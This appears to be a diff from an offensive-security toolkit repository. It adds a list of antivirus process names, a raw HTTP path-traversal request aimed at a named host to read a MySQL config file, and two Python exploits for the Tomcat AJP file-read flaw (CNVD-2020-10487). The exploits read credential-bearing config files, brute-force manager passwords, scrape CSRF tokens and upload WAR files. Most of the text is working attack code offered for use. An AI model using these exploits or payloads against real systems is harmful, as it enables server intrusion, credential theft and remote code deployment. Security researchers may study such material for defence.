+"AVGCHSVX.exe": "AVG",
+"AVGCSRVX": "AVG",
+"AVGNSX.exe": "AVG",
+"AVGCC32.exe": "AVG",
+"AVGCTRL.exe": "AVG",
+"AVGEMC.exe": "AVG",
+"AVGFWSRV.exe": "AVG",
+"AVGNTMGR.exe": "AVG",
+"AVGSERV.exe": "AVG",
+"AVGTRAY.exe": "AVG",
+"AVGUPSVC.exe": "AVG",
+"AVINITNT.exe": "Command AntiVirus for NT Server",
+"AVPCC.exe": "Kaspersky",
+"AVSERVER.exe": "Kerio MailServer",
+"AVSCHED32.exe": "H+BEDV",
+"AVSYNMGR.exe": "McAfee",
+"AVWUPSRV.exe": "H+BEDV",
+"BDSWITCH.exe": "BitDefender Module",
+"BLACKD.exe": "BlackICE",
+"CCEVTMGR.exe": "Symantec",
+"CFP.exe": "COMODO",
+"CLAMWIN.exe": "ClamWin Portable",
+"CUREIT.exe": "DrWeb CureIT",
+"DEFWATCH.exe": "Norton Antivirus",
+"DRWADINS.exe": "Dr.Web",
+"DRWEB.exe": "Dr.Web",
+"DEFENDERDAEMON.exe": "ShadowDefender",
+"EWIDOCTRL.exe": "Ewido Security Suite",
+"EZANTIVIRUSREGISTRATIONCHECK.exe": "e-Trust Antivirus",
+"FIREWALL.exe": "AshampooSoftware",
+"FPROTTRAY.exe": "F-PROT Antivirus",
+"FPWIN.exe": "Verizon",
+"FRESHCLAM.exe": "ClamAV",
+"FSAV32.exe": "F-Secure",
+"FSBWSYS.exe": "F-secure",
+"FSDFWD.exe": "F-Secure",
+"FSGK32.exe": "F-Secure",
+"FSGK32ST.exe": "F-Secure",
+"FSMA32.exe": "F-Secure",
+"FSMB32.exe": "F-Secure",
+"FSSM32.exe": "F-Secure",
+"GUARDGUI.exe": "网游保镖",
+"GUARDNT.exe": "IKARUS",
+"IAMAPP.exe": "Symantec",
+"INOCIT.exe": "eTrust",
+"INORPC.exe": "eTrust",
+"INORT.exe": "eTrust",
+"INOTASK.exe": "eTrust",
+"INOUPTNG.exe": "eTrust",
+"ISAFE.exe": "eTrust",
+"KAV.exe": "Kaspersky",
+"KAVMM.exe": "Kaspersky",
+"KAVPF.exe": "Kaspersky",
+"KAVPFW.exe": "Kaspersky",
+"KAVSTART.exe": "Kaspersky",
+"KAVSVC.exe": "Kaspersky",
+"KAVSVCUI.exe": "Kaspersky",
+"KMAILMON.exe": "金山毒霸",
+"MCAGENT.exe": "McAfee",
+"MCMNHDLR.exe": "McAfee",
+"MCREGWIZ.exe": "McAfee",
+"MCUPDATE.exe": "McAfee",
+"MCVSSHLD.exe": "McAfee",
+"MINILOG.exe": "Zone Alarm",
+"MYAGTSVC.exe": "McAfee",
+"MYAGTTRY.exe": "McAfee",
+"NAVAPSVC.exe": "Norton",
+"NAVAPW32.exe": "Norton",
+"NAVLU32.exe": "Norton",
+"NAVW32.exe": "Norton Antivirus",
+"NEOWATCHLOG.exe": "NeoWatch",
+"NEOWATCHTRAY.exe": "NeoWatch",
+"NISSERV.exe": "Norton",
+"NISUM.exe": "Norton",
+"NMAIN.exe": "Norton",
+"NOD32.exe": "ESET NOD32",
+"NPFMSG.exe": "Norman个人防火墙",
+"NPROTECT.exe": "Symantec",
+"NSMDTR.exe": "Norton",
+"NTRTSCAN.exe": "趋势科技",
+"OFCPFWSVC.exe": "OfficeScanNT",
+"ONLINENT.exe": "已知杀软进程,名称暂未收录",
+"OP_MON.exe": " OutpostFirewall",
+"PAVFIRES.exe": "熊猫卫士",
+"PAVFNSVR.exe": "熊猫卫士",
+"PAVKRE.exe": "熊猫卫士",
+"PAVPROT.exe": "熊猫卫士",
+"PAVPROXY.exe": "熊猫卫士",
+"PAVPRSRV.exe": "熊猫卫士",
+"PAVSRV51.exe": "熊猫卫士",
+"PAVSS.exe": "熊猫卫士",
+"PCCGUIDE.exe": "PC-cillin",
+"PCCIOMON.exe": "PC-cillin",
+"PCCNTMON.exe": "PC-cillin",
+"PCCPFW.exe": "趋势科技",
+"PCCTLCOM.exe": "趋势科技",
+"PCTAV.exe": "PC Tools AntiVirus",
+"PERSFW.exe": "Tiny Personal Firewall",
+"PERVAC.exe": "已知杀软进程,名称暂未收录",
+"PESTPATROL.exe": "Ikarus",
+"PREVSRV.exe": "熊猫卫士",
+"RTVSCN95.exe": "Real-time Virus Scanner",
+"SAVADMINSERVICE.exe": "SAV",
+"SAVMAIN.exe": "SAV",
+"SAVSCAN.exe": "SAV",
+"SDHELP.exe": "Spyware Doctor",
+"SHSTAT.exe": "McAfee",
+"SPBBCSVC.exe": "Symantec",
+"SPIDERCPL.exe": "Dr.Web",
+"SPIDERML.exe": "Dr.Web",
+"SPIDERUI.exe": "Dr.Web",
+"SPYBOTSD.exe": "Spybot ",
+"SWAGENT.exe": "SonicWALL",
+"SWDOCTOR.exe": "SonicWALL",
+"SWNETSUP.exe": "Sophos",
+"SYMLCSVC.exe": "Symantec",
+"SYMPROXYSVC.exe": "Symantec",
+"SYMSPORT.exe": "Sysmantec",
+"SYMWSC.exe": "Sysmantec",
+"SYNMGR.exe": "Sysmantec",
+"TMLISTEN.exe": "趋势科技",
+"TMNTSRV.exe": "趋势科技",
+"TMPROXY.exe": "趋势科技",
+"TNBUTIL.exe": "Anti-Virus",
+"VBA32ECM.exe": "已知杀软进程,名称暂未收录",
+"VBA32IFS.exe": "已知杀软进程,名称暂未收录",
+"VBA32PP3.exe": "已知杀软进程,名称暂未收录",
+"VCRMON.exe": "VirusChaser",
+"VRMONNT.exe": "HAURI",
+"VRMONSVC.exe": "HAURI",
+"VSHWIN32.exe": "McAfee",
+"VSSTAT.exe": "McAfee",
+"XCOMMSVR.exe": "BitDefender",
+"ZONEALARM.exe": "Zone Alarm",
+"360rp.exe": "360杀毒",
+"afwServ.exe": " Avast Antivirus ",
+"safeboxTray.exe": "360杀毒",
+"360safebox.exe": "360杀毒",
+"QQPCTray.exe": "QQ电脑管家",
+"KSafeTray.exe": "金山毒霸",
+"KSafeSvc.exe": "金山毒霸",
+"KWatch.exe": "金山毒霸",
+"gov_defence_service.exe": "云锁",
+"gov_defence_daemon.exe": "云锁",
+"smartscreen.exe": "Windows Defender",
+"SunloginClient.exe": "向日葵",
+"finalshell.exe": "finalshell终端管理"

property/test.txt

@@ -0,0 +1,10 @@
+POST /mac/gateway.php HTTP/1.1
+Host: q.leoei.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Content-Length: 43
+Charset: utf-8
+Content-Type: application/x-www-form-urlencoded
+Referer: https://servicewechat.com/wxe1d5f6d5f6c6a21f/5/page-frame.html
+Accept-Encoding: gzip
+
+json={"url":"/general/../../mysql5/my.ini"}

pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py

@@ -0,0 +1,326 @@
+######f0ng######usage:ip -p port
+# -*- coding: utf-8 -*-
+
+#CNVD-2020-10487  Tomcat-Ajp lfi
+
+import struct
+
+# Some references:
+# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
+def pack_string(s):
+	if s is None:
+		return struct.pack(">h", -1)
+	l = len(s)
+	return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
+def unpack(stream, fmt):
+	size = struct.calcsize(fmt)
+	buf = stream.read(size)
+	return struct.unpack(fmt, buf)
+def unpack_string(stream):
+	size, = unpack(stream, ">h")
+	if size == -1: # null string
+		return None
+	res, = unpack(stream, "%ds" % size)
+	stream.read(1) # \0
+	return res
+class NotFoundException(Exception):
+	pass
+class AjpBodyRequest(object):
+	# server == web server, container == servlet
+	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
+	MAX_REQUEST_LENGTH = 8186
+	def __init__(self, data_stream, data_len, data_direction=None):
+		self.data_stream = data_stream
+		self.data_len = data_len
+		self.data_direction = data_direction
+	def serialize(self):
+		data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
+		if len(data) == 0:
+			return struct.pack(">bbH", 0x12, 0x34, 0x00)
+		else:
+			res = struct.pack(">H", len(data))
+			res += data
+		if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
+			header = struct.pack(">bbH", 0x12, 0x34, len(res))
+		else:
+			header = struct.pack(">bbH", 0x41, 0x42, len(res))
+		return header + res
+	def send_and_receive(self, socket, stream):
+		while True:
+			data = self.serialize()
+			socket.send(data)
+			r = AjpResponse.receive(stream)
+			while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
+				r = AjpResponse.receive(stream)
+
+			if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
+				break
+class AjpForwardRequest(object):
+	_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
+	REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
+	# server == web server, container == servlet
+	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
+	COMMON_HEADERS = ["SC_REQ_ACCEPT",
+		"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
+		"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
+		"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
+	]
+	ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
+	def __init__(self, data_direction=None):
+		self.prefix_code = 0x02
+		self.method = None
+		self.protocol = None
+		self.req_uri = None
+		self.remote_addr = None
+		self.remote_host = None
+		self.server_name = None
+		self.server_port = None
+		self.is_ssl = None
+		self.num_headers = None
+		self.request_headers = None
+		self.attributes = None
+		self.data_direction = data_direction
+	def pack_headers(self):
+		self.num_headers = len(self.request_headers)
+		res = ""
+		res = struct.pack(">h", self.num_headers)
+		for h_name in self.request_headers:
+			if h_name.startswith("SC_REQ"):
+				code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
+				res += struct.pack("BB", 0xA0, code)
+			else:
+				res += pack_string(h_name)
+
+			res += pack_string(self.request_headers[h_name])
+		return res
+
+	def pack_attributes(self):
+		res = b""
+		for attr in self.attributes:
+			a_name = attr['name']
+			code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
+			res += struct.pack("b", code)
+			if a_name == "req_attribute":
+				aa_name, a_value = attr['value']
+				res += pack_string(aa_name)
+				res += pack_string(a_value)
+			else:
+				res += pack_string(attr['value'])
+		res += struct.pack("B", 0xFF)
+		return res
+	def serialize(self):
+		res = ""
+		res = struct.pack("bb", self.prefix_code, self.method)
+		res += pack_string(self.protocol)
+		res += pack_string(self.req_uri)
+		res += pack_string(self.remote_addr)
+		res += pack_string(self.remote_host)
+		res += pack_string(self.server_name)
+		res += struct.pack(">h", self.server_port)
+		res += struct.pack("?", self.is_ssl)
+		res += self.pack_headers()
+		res += self.pack_attributes()
+		if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
+			header = struct.pack(">bbh", 0x12, 0x34, len(res))
+		else:
+			header = struct.pack(">bbh", 0x41, 0x42, len(res))
+		return header + res
+	def parse(self, raw_packet):
+		stream = StringIO(raw_packet)
+		self.magic1, self.magic2, data_len = unpack(stream, "bbH")
+		self.prefix_code, self.method = unpack(stream, "bb")
+		self.protocol = unpack_string(stream)
+		self.req_uri = unpack_string(stream)
+		self.remote_addr = unpack_string(stream)
+		self.remote_host = unpack_string(stream)
+		self.server_name = unpack_string(stream)
+		self.server_port = unpack(stream, ">h")
+		self.is_ssl = unpack(stream, "?")
+		self.num_headers, = unpack(stream, ">H")
+		self.request_headers = {}
+		for i in range(self.num_headers):
+			code, = unpack(stream, ">H")
+			if code > 0xA000:
+				h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
+			else:
+				h_name = unpack(stream, "%ds" % code)
+				stream.read(1) # \0
+			h_value = unpack_string(stream)
+			self.request_headers[h_name] = h_value
+	def send_and_receive(self, socket, stream, save_cookies=False):
+		res = []
+		i = socket.sendall(self.serialize())
+		if self.method == AjpForwardRequest.POST:
+			return res
+
+		r = AjpResponse.receive(stream)
+		assert r.prefix_code == AjpResponse.SEND_HEADERS
+		res.append(r)
+		if save_cookies and 'Set-Cookie' in r.response_headers:
+			self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
+
+		# read body chunks and end response packets
+		while True:
+			r = AjpResponse.receive(stream)
+			res.append(r)
+			if r.prefix_code == AjpResponse.END_RESPONSE:
+				break
+			elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
+				continue
+			else:
+				raise NotImplementedError
+				break
+
+		return res
+
+class AjpResponse(object):
+	_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
+	COMMON_SEND_HEADERS = [
+			"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
+			"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
+			]
+	def parse(self, stream):
+		# read headers
+		self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
+
+		if self.prefix_code == AjpResponse.SEND_HEADERS:
+			self.parse_send_headers(stream)
+		elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
+			self.parse_send_body_chunk(stream)
+		elif self.prefix_code == AjpResponse.END_RESPONSE:
+			self.parse_end_response(stream)
+		elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
+			self.parse_get_body_chunk(stream)
+		else:
+			raise NotImplementedError
+
+	def parse_send_headers(self, stream):
+		self.http_status_code, = unpack(stream, ">H")
+		self.http_status_msg = unpack_string(stream)
+		self.num_headers, = unpack(stream, ">H")
+		self.response_headers = {}
+		for i in range(self.num_headers):
+			code, = unpack(stream, ">H")
+			if code <= 0xA000: # custom header
+				h_name, = unpack(stream, "%ds" % code)
+				stream.read(1) # \0
+				h_value = unpack_string(stream)
+			else:
+				h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
+				h_value = unpack_string(stream)
+			self.response_headers[h_name] = h_value
+
+	def parse_send_body_chunk(self, stream):
+		self.data_length, = unpack(stream, ">H")
+		self.data = stream.read(self.data_length+1)
+
+	def parse_end_response(self, stream):
+		self.reuse, = unpack(stream, "b")
+
+	def parse_get_body_chunk(self, stream):
+		rlen, = unpack(stream, ">H")
+		return rlen
+
+	@staticmethod
+	def receive(stream):
+		r = AjpResponse()
+		r.parse(stream)
+		return r
+
+import socket
+
+def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
+	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
+	fr.method = method
+	fr.protocol = "HTTP/1.1"
+	fr.req_uri = req_uri
+	fr.remote_addr = target_host
+	fr.remote_host = None
+	fr.server_name = target_host
+	fr.server_port = 80
+	fr.request_headers = {
+		'SC_REQ_ACCEPT': 'text/html',
+		'SC_REQ_CONNECTION': 'keep-alive',
+		'SC_REQ_CONTENT_LENGTH': '0',
+		'SC_REQ_HOST': target_host,
+		'SC_REQ_USER_AGENT': 'Mozilla',
+		'Accept-Encoding': 'gzip, deflate, sdch',
+		'Accept-Language': 'en-US,en;q=0.5',
+		'Upgrade-Insecure-Requests': '1',
+		'Cache-Control': 'max-age=0'
+	}
+	fr.is_ssl = False
+	fr.attributes = []
+	return fr
+
+class Tomcat(object):
+	def __init__(self, target_host, target_port):
+		self.target_host = target_host
+		self.target_port = target_port
+
+		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+		self.socket.connect((target_host, target_port))
+		self.stream = self.socket.makefile("rb", bufsize=0)
+
+	def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
+		self.req_uri = req_uri
+		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
+		print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
+		if user is not None and password is not None:
+			self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
+		for h in headers:
+			self.forward_request.request_headers[h] = headers[h]
+		for a in attributes:
+			self.forward_request.attributes.append(a)
+		responses = self.forward_request.send_and_receive(self.socket, self.stream)
+		if len(responses) == 0:
+			return None, None
+		snd_hdrs_res = responses[0]
+		data_res = responses[1:-1]
+		if len(data_res) == 0:
+			print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
+		return snd_hdrs_res, data_res
+
+'''
+javax.servlet.include.request_uri
+javax.servlet.include.path_info
+javax.servlet.include.servlet_path
+'''
+
+import argparse
+parser = argparse.ArgumentParser()
+parser.add_argument("target", type=str, help="Hostname or IP to attack")
+parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
+parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
+args = parser.parse_args()
+t = Tomcat(args.target, args.port)
+
+_,data = t.perform_request('/asdf',attributes=[
+    {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
+    {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
+    {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
+    ])
+print('----------------------------')
+print("".join([d.data for d in data]))
+
+if "WEB-INF" in "".join([d.data for d in data]):
+	print("**********************注意可能有WEB-INF配置文件*************************")
+
+words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties',
+'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',]
+
+for word in words_list:
+
+	print(":::::::::" + word + ":::::::::")
+
+	_,data = t.perform_request('/asdf',attributes=[
+		{'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
+		{'name':'req_attribute','value':['javax.servlet.include.path_info',word]},
+		{'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
+		])
+	print('----------------------------')
+	if "Error report" in "".join([d.data for d in data]):
+		pass
+	else:
+		print("".join([d.data for d in data]))

pythonexp/Tomcat/CNVD-2020-10487-pro.py

@@ -0,0 +1,363 @@
+######f0ng######usage:ip -p port
+# -*- coding:utf-8 -*-
+#
+# Julien Legras - Synacktiv
+#
+# THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
+# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
+# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException
+from pprint import pprint, pformat
+
+import socket
+import argparse
+import logging
+import re
+import os
+from StringIO import StringIO
+import logging
+from colorlog import ColoredFormatter
+from urllib import unquote
+
+
+def setup_logger():
+    """Return a logger with a default ColoredFormatter."""
+    formatter = ColoredFormatter(
+        "[%(asctime)s.%(msecs)03d] %(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s",
+        datefmt="%Y-%m-%d %H:%M:%S",
+        reset=True,
+        log_colors={
+            'DEBUG': 'bold_purple',
+            'INFO': 'bold_green',
+            'WARNING': 'bold_yellow',
+            'ERROR': 'bold_red',
+            'CRITICAL': 'bold_red',
+        }
+    )
+
+    logger = logging.getLogger('meow')
+    handler = logging.StreamHandler()
+    handler.setFormatter(formatter)
+    logger.addHandler(handler)
+    logger.setLevel(logging.DEBUG)
+
+    return logger
+
+
+logger = setup_logger()
+
+
+# helpers
+def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
+    fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
+    fr.method = method
+    fr.protocol = "HTTP/1.1"
+    fr.req_uri = req_uri
+    fr.remote_addr = target_host
+    fr.remote_host = None
+    fr.server_name = target_host
+    fr.server_port = 80
+    fr.request_headers = {
+        'SC_REQ_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+        'SC_REQ_CONNECTION': 'keep-alive',
+        'SC_REQ_CONTENT_LENGTH': '0',
+        'SC_REQ_HOST': target_host,
+        'SC_REQ_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0',
+        'Accept-Encoding': 'gzip, deflate, sdch',
+        'Accept-Language': 'en-US,en;q=0.5',
+        'Upgrade-Insecure-Requests': '1',
+        'Cache-Control': 'max-age=0'
+    }
+    fr.is_ssl = False
+
+    fr.attributes = []
+
+    return fr
+
+
+class Tomcat(object):
+    def __init__(self, target_host, target_port):
+        self.target_host = target_host
+        self.target_port = target_port
+
+        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        self.socket.connect((target_host, target_port))
+        self.stream = self.socket.makefile("rb", bufsize=0)
+
+    def test_password(self, user, password):
+        res = False
+        stop = False
+        self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode(
+            'base64').replace('\n', '')
+        while not stop:
+            logger.debug("testing %s:%s" % (user, password))
+            responses = self.forward_request.send_and_receive(self.socket, self.stream)
+            snd_hdrs_res = responses[0]
+            if snd_hdrs_res.http_status_code == 404:
+                raise NotFoundException("The req_uri %s does not exist!" % self.req_uri)
+            elif snd_hdrs_res.http_status_code == 302:
+                self.req_uri = snd_hdrs_res.response_headers.get('Location', '')
+                logger.info("Redirecting to %s" % self.req_uri)
+                self.forward_request.req_uri = self.req_uri
+            elif snd_hdrs_res.http_status_code == 200:
+                logger.info("Found valid credz: %s:%s" % (user, password))
+                res = True
+                stop = True
+                if 'Set-Cookie' in snd_hdrs_res.response_headers:
+                    logger.info("Here is your cookie: %s" % (snd_hdrs_res.response_headers.get('Set-Cookie', '')))
+            elif snd_hdrs_res.http_status_code == 403:
+                logger.info("Found valid credz: %s:%s but the user is not authorized to access this resource" % (
+                    user, password))
+                stop = True
+            elif snd_hdrs_res.http_status_code == 401:
+                stop = True
+
+        return res
+
+    def start_bruteforce(self, users, passwords, req_uri, autostop):
+        logger.info("Attacking a tomcat at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
+        self.req_uri = req_uri
+        self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri)
+
+        f_users = open(users, "r")
+        f_passwords = open(passwords, "r")
+
+        valid_credz = []
+        try:
+            for user in f_users:
+                f_passwords.seek(0, 0)
+                for password in f_passwords:
+                    if autostop and len(valid_credz) > 0:
+                        self.socket.close()
+                        return valid_credz
+
+                    user = user.rstrip('\n')
+                    password = password.rstrip('\n')
+                    if self.test_password(user, password):
+                        valid_credz.append((user, password))
+        except NotFoundException as e:
+            logger.fatal(e.message)
+        finally:
+            logger.debug("Closing socket...")
+            self.socket.close()
+            return valid_credz
+
+    def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
+        self.req_uri = req_uri
+        self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri,
+                                                           method=AjpForwardRequest.REQUEST_METHODS.get(method))
+        logger.debug("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
+        if user is not None and password is not None:
+            self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + (
+                    "%s:%s" % (user, password)).encode('base64').replace('\n', '')
+
+        for h in headers:
+            self.forward_request.request_headers[h] = headers[h]
+
+        for a in attributes:
+            self.forward_request.attributes.append(a)
+
+        responses = self.forward_request.send_and_receive(self.socket, self.stream)
+        print(responses)
+        if len(responses) == 0:
+            return None, None
+
+        snd_hdrs_res = responses[0]
+
+        data_res = responses[1:-1]
+        if len(data_res) == 0:
+            logger.info("No data in response. Headers:\n %s" % pformat(vars(snd_hdrs_res)))
+
+        return snd_hdrs_res, data_res
+
+    def upload(self, filename, user, password, old_version, headers={}):
+        deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
+        with open(filename, "rb") as f_input:
+            with open("/tmp/request", "w+b") as f:
+                s_form_header = '------WebKitFormBoundaryb2qpuwMoVtQJENti\r\nContent-Disposition: form-data; name="deployWar"; filename="%s"\r\nContent-Type: application/octet-stream\r\n\r\n' % os.path.basename(
+                    filename)
+                s_form_footer = '\r\n------WebKitFormBoundaryb2qpuwMoVtQJENti--\r\n'
+                f.write(s_form_header)
+                f.write(f_input.read())
+                f.write(s_form_footer)
+
+        data_len = os.path.getsize("/tmp/request")
+
+        headers = {
+            "SC_REQ_CONTENT_TYPE": "multipart/form-data; boundary=----WebKitFormBoundaryb2qpuwMoVtQJENti",
+            "SC_REQ_CONTENT_LENGTH": "%d" % data_len,
+            "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host),
+            "Origin": "http://%s" % (self.target_host),
+        }
+        if obj_cookie is not None:
+            headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie')
+
+        attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")},
+                      {"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "12345")}]
+        if old_version == False:
+            attributes.append({"name": "query_string", "value": deploy_csrf_token})
+        old_apps = self.list_installed_applications(user, password, old_version)
+        r = self.perform_request("/manager/html/upload", headers=headers, method="POST", user=user, password=password,
+                                 attributes=attributes)
+
+        with open("/tmp/request", "rb") as f:
+            br = AjpBodyRequest(f, data_len, AjpBodyRequest.SERVER_TO_CONTAINER)
+            br.send_and_receive(self.socket, self.stream)
+
+        r = AjpResponse.receive(self.stream)
+        if r.prefix_code == AjpResponse.END_RESPONSE:
+            logger.error('Upload failed')
+
+        while r.prefix_code != AjpResponse.END_RESPONSE:
+            r = AjpResponse.receive(self.stream)
+        logger.debug('Upload seems normal. Checking...')
+        new_apps = self.list_installed_applications(user, password, old_version)
+        if len(new_apps) == len(old_apps) + 1 and new_apps[:-1] == old_apps:
+            logger.info('Upload success!')
+        else:
+            logger.error('Upload failed')
+
+    def get_error_page(self):
+        return self.perform_request("/blablablablabla")
+
+    def get_version(self):
+        hdrs, data = self.get_error_page()
+        for d in data:
+            s = re.findall('(Apache Tomcat/[0-9\.]+) ', d.data)
+            if len(s) > 0:
+                return s[0]
+
+    def get_csrf_token(self, user, password, old_version, headers={}, query=[]):
+        # first we request the manager page to get the CSRF token
+        hdrs, rdata = self.perform_request("/manager/html", headers=headers, user=user, password=password)
+        deploy_csrf_token = re.findall('(org.apache.catalina.filters.CSRF_NONCE=[0-9A-F]*)"',
+                                       "".join([d.data for d in rdata]))
+        if old_version == False:
+            if len(deploy_csrf_token) == 0:
+                logger.critical("Failed to get CSRF token. Check the credentials")
+                return
+
+            logger.debug('CSRF token = %s' % deploy_csrf_token[0])
+        obj = re.match("(?P<cookie>JSESSIONID=[0-9A-F]*); Path=/manager(/)?; HttpOnly",
+                       hdrs.response_headers.get('Set-Cookie', ''))
+        if obj is not None:
+            return deploy_csrf_token[0], obj
+        return deploy_csrf_token[0], None
+
+    def list_installed_applications(self, user, password, old_version, headers={}):
+        deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
+        headers = {
+            "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded",
+            "SC_REQ_CONTENT_LENGTH": "0",
+            "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host),
+            "Origin": "http://%s" % (self.target_host),
+        }
+        if obj_cookie is not None:
+            headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie')
+
+        attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")},
+                      {"name": "req_attribute",
+                       "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}]
+        if old_version == False:
+            attributes.append({
+                "name": "query_string", "value": "%s" % deploy_csrf_token})
+        hdrs, data = self.perform_request("/manager/html/", headers=headers, method="GET", user=user, password=password,
+                                          attributes=attributes)
+        found = []
+        for d in data:
+            im = re.findall('/manager/html/expire\?path=([^&]*)&', d.data)
+            for app in im:
+                found.append(unquote(app))
+        return found
+
+    def undeploy(self, path, user, password, old_version, headers={}):
+        deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
+        path_app = "path=%s" % path
